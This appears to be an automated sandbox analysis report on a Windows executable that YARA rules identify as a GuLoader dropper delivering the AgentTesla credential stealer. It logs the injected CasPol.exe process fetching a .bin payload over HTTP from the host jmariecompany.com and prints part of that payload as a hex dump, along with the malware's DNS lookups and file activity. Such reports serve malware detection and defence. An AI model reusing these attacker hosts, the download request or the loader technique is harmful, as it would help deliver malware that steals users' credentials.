RT_ICON 0x69b80 0x94a8 data English United States

RT_ICON 0x73028 0x5488 data English United States

RT_ICON 0x784b0 0x4228 dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 33, next used block 0 English United States

RT_ICON 0x7c6d8 0x25a8 dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 English United States

RT_ICON 0x7ec80 0x10a8 dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 English United States

RT_ICON 0x7fd28 0x988 data English United States

RT_ICON 0x806b0 0x468 GLS_BINARY_LSB_FIRST English United States

RT_DIALOG 0x80b18 0x100 data English United States

RT_DIALOG 0x80c18 0x11c data English United States

RT_DIALOG 0x80d38 0xc4 data English United States

Rich Headers

Data Directories

Sections

Resources


RT_DIALOG 0x80e00 0x60 data English United States

RT_GROUP_ICON 0x80e60 0x76 data English United States

RT_VERSION 0x80ed8 0x2b4 data English United States

RT_MANIFEST 0x81190 0x33e XML 1.0 document, ASCII text, with very long lines, with no line terminators English United States


DLL Import

ADVAPI32.dll RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW

SHELL32.dll SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW

ole32.dll OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree

COMCTL32.dll ImageList_Create, ImageList_Destroy, ImageList_AddMasked

USER32.dll GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu

GDI32.dll SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject

KERNEL32.dll GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Description Data

LegalCopyright Wyndham International Inc

FileVersion 16.9.22

CompanyName GreenPoint Financial Corp.

LegalTrademarks BorgWarner Inc.

Comments Walgreen Co

ProductName Systemax Inc.

FileDescription Fortinet Inc.

Translation 0x0409 0x04b0

Language of compilation system Country where language is spoken Map

English United States

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution


Total Packets: 50

• 53 (DNS)

• 80 (HTTP)

Timestamp Source Port Dest Port Source IP Dest IP

Jun 2, 2022 16:46:17.339750051 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.522840977 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.523098946 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.523752928 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.697953939 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703290939 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703397989 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703445911 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703491926 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703519106 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.703552961 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.703568935 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703628063 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.703632116 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703651905 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.703701973 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703746080 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.703756094 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703793049 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.703824043 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703871965 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.703882933 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.703918934 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.703977108 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.704030991 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.888196945 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.888259888 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.888308048 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.888354063 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.888381958 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.888425112 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.888494015 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.888556957 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.889170885 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889271021 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889318943 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889369011 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889372110 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.889442921 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889492989 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889511108 CEST 49746 80 192.168.11.20 139.28.232.231

TCP Packets


Jun 2, 2022 16:46:17.889533997 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.889559984 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889616966 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889652967 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.889671087 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889715910 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.889731884 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889792919 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889832973 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.889846087 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889904022 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.889908075 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.889955997 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.889971018 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.890027046 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.890028954 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.890080929 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.890093088 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:17.890182018 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:17.890260935 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.101731062 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.101799965 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.101846933 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.101892948 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.102013111 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.102062941 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.102076054 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.103296041 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.103430986 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.103466034 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.103528976 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.103585958 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.103636026 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.103684902 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.103745937 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.103792906 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.103802919 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.103861094 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.103900909 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.103916883 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.103949070 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.103991985 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.104007006 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.104058027 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.104095936 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.104111910 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.104166985 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.104167938 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.104221106 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.104231119 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.104269028 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.104293108 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.104329109 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.104350090 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.104401112 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.104404926 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.104449987 CEST 49746 80 192.168.11.20 139.28.232.231

Jun 2, 2022 16:46:18.104464054 CEST 80 49746 139.28.232.231 192.168.11.20

Jun 2, 2022 16:46:18.104497910 CEST 49746 80 192.168.11.20 139.28.232.231


Timestamp Source Port Dest Port Source IP Dest IP

Jun 2, 2022 16:46:17.313322067 CEST 64547 53 192.168.11.20 1.1.1.1

Jun 2, 2022 16:46:17.329067945 CEST 53 64547 1.1.1.1 192.168.11.20

Jun 2, 2022 16:46:29.524741888 CEST 53471 53 192.168.11.20 1.1.1.1

Jun 2, 2022 16:46:30.537839890 CEST 53471 53 192.168.11.20 9.9.9.9

Jun 2, 2022 16:46:30.541223049 CEST 53 53471 9.9.9.9 192.168.11.20

Jun 2, 2022 16:46:30.963263988 CEST 53 53471 1.1.1.1 192.168.11.20

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class

Jun 2, 2022 16:46:17.313322067 CEST 192.168.11.20 1.1.1.1 0x2081 Standard query (0) jmariecompany.com A (IP address) IN (0x0001)

Jun 2, 2022 16:46:29.524741888 CEST 192.168.11.20 1.1.1.1 0xa522 Standard query (0) alighierieventos.com A (IP address) IN (0x0001)

Jun 2, 2022 16:46:30.537839890 CEST 192.168.11.20 9.9.9.9 0xa522 Standard query (0) alighierieventos.com A (IP address) IN (0x0001)

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

Jun 2, 2022 16:45:40.144823074 CEST 1.1.1.1 192.168.11.20 0xa3c4 No error (0) www-bing-com.dual-a-0001.a-msedge.net dual-a-0001.a-msedge.net CNAME (Canonical name) IN (0x0001)

Jun 2, 2022 16:45:40.144823074 CEST 1.1.1.1 192.168.11.20 0xa3c4 No error (0) dual-a-0001.a-msedge.net 13.107.21.200 A (IP address) IN (0x0001)

Jun 2, 2022 16:45:40.144823074 CEST 1.1.1.1 192.168.11.20 0xa3c4 No error (0) dual-a-0001.a-msedge.net 204.79.197.200 A (IP address) IN (0x0001)

Jun 2, 2022 16:45:40.294567108 CEST 1.1.1.1 192.168.11.20 0x1fe8 No error (0) devcenterapi.azure-api.net apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net CNAME (Canonical name) IN (0x0001)

Jun 2, 2022 16:45:40.294567108 CEST 1.1.1.1 192.168.11.20 0x1fe8 No error (0) devcenterapi-eastus-01.regional.azure-api.net apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net CNAME (Canonical name) IN (0x0001)

Jun 2, 2022 16:46:17.329067945 CEST 1.1.1.1 192.168.11.20 0x2081 No error (0) jmariecompany.com 139.28.232.231 A (IP address) IN (0x0001)

Jun 2, 2022 16:46:30.541223049 CEST 9.9.9.9 192.168.11.20 0xa522 Name error (3) alighierieventos.com none none A (IP address) IN (0x0001)

Jun 2, 2022 16:46:30.963263988 CEST 1.1.1.1 192.168.11.20 0xa522 No error (0) alighierieventos.com 50.31.177.39 A (IP address) IN (0x0001)

jmariecompany.com

Session ID Source IP Source Port Destination IP Destination Port Process

0 192.168.11.20 49746 139.28.232.231 80 C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp kBytes transferred Direction Data

Jun 2, 2022 16:46:17.523752928 CEST 469 OUT
GET /Buhari0f_XGXisVNVRE198.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: jmariecompany.com
Cache-Control: no-cache

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets


Jun 2, 2022 16:46:17.703290939 CEST

471 IN HTTP/1.1 200 OKDate: Thu, 02 Jun 2022 14:46:17 GMTServer: ApacheLast-Modified: Wed, 01 Jun 2022 23:51:39 GMTAccept-Ranges: bytesContent-Length: 214592Content-Type: application/octet-streamData Raw: 5d 54 94 7f d1 ed 07 27 83 8f ba 03 ce 96 eb fc 2c b5 97 d4 5b 52 96 47 ad d8 f2 5b 13 86 92 e5 81 d8 dc a5 97 a6 59 ab f4 72 57 b3 16 77 97 0f e7 55 76 e9 b1 d8 8e d1 e6 6b f8 9e c1 36 b6 85 d9 d2 67 61 24 af 97 88 09 90 ec 70 fb ef 57 77 22 dc 0a 70 7b 78 bf dd 31 b1 7b de 9e 59 4b cc 6b 58 d4 da 19 72 30 fc fe ab 5a 6b 87 16 55 23 14 d9 7a 96 6c 2e a9 a1 2c 7c a9 2f 3c 42 3a 84 35 61 b9 80 d7 56 a1 ce 5e 5f 0a 90 cf 09 79 c5 56 bc a0 57 17 4b c4 52 84 c2 1f b4 1e 8e 89 c0 bf e8 fd 02 8c ff 06 d0 af 38 fe c5 38 0c d1 a3 ba 74 5e be bd c5 a0 3e e5 e7 4c e9 b8 a9 1e 93 51 aa 47 29 ba f2 97 06 28 91 17 4a 87 22 7f 4e a8 d9 68 49 a8 8e 11 ba 52 48 8c e7 b2 3b 2d f3 54 51 66 be f4 47 85 5e c9 b4 d2 a1 ce e3 49 36 0b 89 dd 65 55 78 4c c3 6b 82 c6 57 70 f5 b0 a9 c1 f4 45 0e c2 fb 3f 03 1d 63 74 3d 9d b5 9a 7e 56 08 26 0e 73 7f 19 fb 77 4c a5 a4 47 f0 21 78 dc b4 e0 1f 1a 07 f7 3c ae 63 e7 38 bc 04 2c 33 b9 96 7f d3 33 82 3d 36 c5 87 f0 1f 0b 06 16 48 0d 28 ae 90 ad d5 49 6c ce 07 c9 cc 74 fb 1c ec b6 89 1e a9 af d1 06 7a 86 2f 20 91 2b 77 c0 aa 81 9b 59 09 f7 98 14 57 73 6b b2 66 a3 58 77 d5 4d 84 69 59 a2 96 e7 ea eb 4e db f3 dd f1 50 20 d6 7b 95 b1 32 8b f4 5e 13 6b b8 82 fc 3c cb 2a 2f 18 92 f2 93 39 87 6a ff 0c 90 39 af 06 01 e5 b3 39 e4 3c 74 15 ad 6e b5 e3 16 f0 86 59 6d 8c 96 90 b0 cb 36 f2 02 b3 95 33 a2 e9 9c 09 9c 1d c5 67 73 13 09 14 b6 be a1 08 d1 43 9e 0f 9c 58 18 9c c9 35 81 bc d4 6a 4a 21 b5 0b 27 58 3e 7b 3c f5 30 3a 48 fd 42 97 2d 5a 4a 98 b1 86 d0 c6 78 fd 3d 9d cf ba 23 57 ad ea 5b 29 5d 9a cd b7 37 d5 c0 09 b2 2e 99 6c 96 52 1d 3e 88 94 d3 c7 33 75 70 3b c8 0e 18 87 d4 0c b3 fb ae 94 ed 00 10 21 1c 3d bc c1 07 1b e5 1f df 95 9f e6 aa c6 1f e8 3c 45 d4 1e 01 f3 03 f1 54 99 75 55 f4 57 76 ac 00 b3 71 01 3d fe 01 45 ec c5 b0 65 25 97 a7 88 f1 59 42 7b 
c4 b0 cf 8f bd 20 06 71 77 ac 86 37 f3 6e 79 33 17 68 82 ef fd af 9d cb e8 e4 55 2b 37 07 67 21 22 67 34 f1 b8 21 8b 4e b4 db 7f 2f 72 9d b3 49 44 a5 af e2 d3 96 3b 4f 77 b7 2b 3c fc ba 4b 0f 34 15 d7 7f 56 7b 08 18 4f e2 d8 0f c9 92 3b 53 da 99 76 67 64 09 d9 a4 ab 21 d6 f6 ff d8 30 be 4d 98 00 77 68 f6 43 91 68 50 01 60 61 39 96 ec 3f 52 ec 95 09 7a 1b 4c 26 01 49 4a 22 36 09 97 a9 ef 33 d3 ed 1e 36 72 d4 33 60 32 e5 a5 52 c2 b2 ae 94 c1 ef b4 68 57 69 79 dc 50 ad 27 29 59 fd e8 57 2e 6a b6 49 dc aa 0a 5f eb e1 8c 37 06 9b b9 f6 fa 8f 69 91 22 b3 8a 27 7f 19 b2 33 54 b9 31 46 ae fb c2 77 4077 af a0 92 6e 6c ff f3 1b 90 d6 06 5f e9 81 03 7c 98 6f 42 0e 30 ae 83 51 94 fb d5 66 a3 f7 3c d2 10 ff f1 18 8f 0e 7c 83 f6 12 a5 e6 9a 3a 25 ce 94 f3 f3 a5 b6 cd dc f0 7a 38 c0 92 d8 58 97 c9 c0 85 6b 52 23 d5 3b c8 cb 28 88 02 43 f5 af 75 69 6b 05 42 b9 9f 23 19 b7 13 db 48 35 28 8c 49 4e be db e0 15 a5 ed 96 ee 4b e9 1d 21 6a 4f ec 78 89 43 93 d6 3e 07 63 5e a0 a3 9d 35 ac c6 68 50 87 b2 a2 94 88 f3 0e 2a af 97 82 27 83 dc 72 04 3e 57 77 9a d9 0a 70 6a 6e b4 f6 6a b1 7c c9 60 58 67 ce 73 53 d4 dd 0f 8c 31 d0 fc bc 51 6b 80 0e ab 22 38 db 51 94 47 cd ab a2 04 6d a9 2f b6 6a 28 84 3b 74 29 8e d7 f1 98 01 7f cf 0b dc 02 2e 2d ad 2e d9 8b 0c 7e 24 a4 37 1b ae 13 d5 67 eb e7 a8 dd 36 9e 4b ae 9a 78 be 88 49 6e e4 50 41 a9 81 fc f8 38 f3 80 c8 ad 3e eb f4 7c eb b8 85 1e 93 01 e8 47 29 e7 e5 9f 2d 79 1d 76 3f 79 23 53 4c b0 d2 68 4e 5e 70 12 97 5b 5e 8c e7 b5 1f d0 f2 78 5b 4d bc df a4 55 5b 67 ef d3 89 da c3 49 3c 21 9a ed 67 55 50 0c c3 6b aa c6 57 61 e1 bb 82 de f4 42 19 3c fa 13 01 01 68 74 Data Ascii: ]T',[RG[YrWwUvk6ga$pWw"p{x1{YKkXr0ZkU#zl.,|/<B:5aV^_yVWKR88t^>LQG)(J"NhIRH;-TQfG^I6eUxLkWpE?ct=~V&swLG!x<c8,33=6H(Iltz/ +wYWskfXwMiYNP {2^k<*/9j99<tnYm63gsCX5jJ!'X>{<0:HB-ZJx=#W[)]7.lR>3up;!=<ETuUWvq=Ee%YB{ 
qw7ny3hU+7g!"g4!N/rID;Ow+<K4V{O;Svgd!0MwhChP`a9?RzL&IJ"636r3`2RhWiyP')YW.jI_7i"'3T1Fw@wnl_|oB0Qf<|:%z8XkR#;(CuikB#H5(INK!jOxC>c^5hP*'r>Wwpjnj|`XgsS1Qk"8QGm/j(;t).-.~$7g6KxInPA8>|G)-yv?y#SLhN^p[^x[MU[gI<!gUPkWaB<ht


• ref002062022pago062022.exe

• CasPol.exe

• CasPol.exe

• CasPol.exe

• CasPol.exe

• CasPol.exe

• conhost.exe

• svchost.exe


Statistics

Behavior

System Behavior

Analysis Process: ref002062022pago062022.exe PID: 3504, Parent PID: 8512


Target ID: 0

Start time: 16:45:47

Start date: 02/06/2022

Path: C:\Users\user\Desktop\ref002062022pago062022.exe

Wow64 process (32bit): true

Commandline: "C:\Users\user\Desktop\ref002062022pago062022.exe"

Imagebase: 0x400000

File size: 275627 bytes

MD5 hash: 7500C0E8DF88D12316724078FFBEEFAA

Has elevated privileges: true

Has administrator privileges: true

Programmed in: C, C++ or other language

Yara matches: Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1514512086.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

Reputation: low


Key Path Completion Count Source Address Symbol

Key Path Name Type Data Completion Count Source Address Symbol

Target ID: 3

Start time: 16:46:05

Start date: 02/06/2022

Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Wow64 process (32bit): false

Commandline: "C:\Users\user\Desktop\ref002062022pago062022.exe"

Imagebase: 0x3e0000

File size: 108664 bytes

MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B

Has elevated privileges: true

Has administrator privileges: true

Programmed in: C, C++ or other language

Reputation: moderate

Target ID: 4

Start time: 16:46:05

Start date: 02/06/2022

Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Wow64 process (32bit): false

Commandline: "C:\Users\user\Desktop\ref002062022pago062022.exe"

Imagebase: 0x240000

File size: 108664 bytes

MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B

Has elevated privileges: true

Has administrator privileges: true

General

File Activities

Registry Activities

Analysis Process: CasPol.exe PID: 1664, Parent PID: 3504

General

Analysis Process: CasPol.exe PID: 1740, Parent PID: 3504

General


Programmed in: C, C++ or other language

Reputation: moderate

Target ID: 5

Start time: 16:46:05

Start date: 02/06/2022

Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Wow64 process (32bit): false

Commandline: "C:\Users\user\Desktop\ref002062022pago062022.exe"

Imagebase: 0x200000

File size: 108664 bytes

MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B

Has elevated privileges: true

Has administrator privileges: true

Programmed in: C, C++ or other language

Reputation: moderate

Target ID: 6

Start time: 16:46:06

Start date: 02/06/2022

Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Wow64 process (32bit): false

Commandline: "C:\Users\user\Desktop\ref002062022pago062022.exe"

Imagebase: 0x300000

File size: 108664 bytes

MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B

Has elevated privileges: true

Has administrator privileges: true

Programmed in: C, C++ or other language

Reputation: moderate

Target ID: 7

Start time: 16:46:06

Start date: 02/06/2022

Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Wow64 process (32bit): true

Commandline: "C:\Users\user\Desktop\ref002062022pago062022.exe"

Imagebase: 0xce0000

File size: 108664 bytes

MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B

Has elevated privileges: true

Has administrator privileges: true

Programmed in: .Net C# or VB.NET

Yara matches: Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000000.856205776.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Analysis Process: CasPol.exe PID: 1900, Parent PID: 3504

General

Analysis Process: CasPol.exe PID: 2172, Parent PID: 3504

General

Analysis Process: CasPol.exe PID: 1836, Parent PID: 3504

General


Reputation: moderate

File Path Access Attributes Options Completion Count Source Address Symbol

C:\Users\user read data or list directory | synchronize device directory file | synchronous io non alert | open for backup ident | open reparse point object name collision 1 6E313263 unknown

C:\Users\user\AppData\Roaming read data or list directory | synchronize device directory file | synchronous io non alert | open for backup ident | open reparse point object name collision 1 6E313263 unknown

C:\Users\user read data or list directory | synchronize device directory file | synchronous io non alert | open for backup ident | open reparse point object name collision 1 6E313263 unknown

C:\Users\user\AppData\Roaming read data or list directory | synchronize device directory file | synchronous io non alert | open for backup ident | open reparse point object name collision 1 6E313263 unknown

File Path Offset Length Value Ascii Completion Count Source Address Symbol

\Device\ConDrv 0 0 75 6e 6b 6e 6f 77 6e unknown success or wait 1 6D1C9B71 WriteFile

\Device\ConDrv 30 30 75 6e 6b 6e 6f 77 6e unknown success or wait 1 6D1C9B71 WriteFile

File Path Offset Length Completion Count Source Address Symbol

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4095 success or wait 1 6E31099B unknown

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 8173 end of file 1 6E31099B unknown

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6E31099B unknown

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 6135 success or wait 1 6E31099B unknown

C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll.aux unknown 176 success or wait 1 6E2662DE ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4095 success or wait 1 6E31D97A ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 8173 end of file 1 6E31D97A ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6E31D97A ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System\68e52ded8d0e73920808d8880ed14efd\System.ni.dll.aux unknown 620 success or wait 1 6E2662DE ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\96b2b7229c43d2712ff1bf4906a723f6\System.Configuration.ni.dll.aux unknown 864 success or wait 1 6E2662DE ReadFile

